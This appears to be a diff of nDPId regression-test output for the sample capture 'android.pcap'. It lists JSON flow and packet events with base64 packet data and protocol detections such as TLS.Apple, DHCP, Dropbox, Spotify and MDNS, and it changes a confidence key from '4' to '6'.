00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1582454796360,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454796360,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIV+oAAEARnGrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454823029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454823029,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIavtMAAEARM6\/AqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454823653,"pkt":"AQBeAAD72DBiVgAcCABFAABJmVsAAP8RtXWp\/uHY4AAA+xTpFOkANUGgAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454823653,"pkt":"AQBeAAD7xiwDYGpkCABFAABJ7RwAAAERKOPAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 